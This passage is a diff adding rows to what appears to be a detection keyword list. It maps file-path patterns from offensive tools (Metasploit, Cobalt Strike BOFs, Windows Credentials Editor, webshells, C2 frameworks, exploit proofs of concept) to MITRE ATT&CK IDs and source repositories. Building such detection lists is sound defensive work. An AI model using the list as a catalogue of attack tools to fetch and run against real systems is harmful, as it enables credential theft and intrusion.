and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/VMware-CVE-2022-22954*","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z"
+"*/vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development.
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads.
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vnik_v1.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6.
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z"
+"*/vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z"
+"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*/vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"*/vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*/wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
+"*/wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
+"*/wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
+"*/wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*/wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*/WDExtract.git*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*/wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*/wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*/wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/WdToggle.c*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z"
+"*/WdToggle.h*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 -
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z"
+"*/weakpass.git*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z"
+"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
+"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
+"*/web/pwn.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 -
TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z"
+"*/web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*/WebC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/WebDavC2.git*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent.
running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z"
+"*/web-hacking-toolkit*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z"
+"*/weblistener.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
+"*/weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/webshell.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/webshell/*.aspx*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell.
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z"
+"*/webshell/*.jsp*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell.
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z"
+"*/webshell/*.php*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell.
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z"
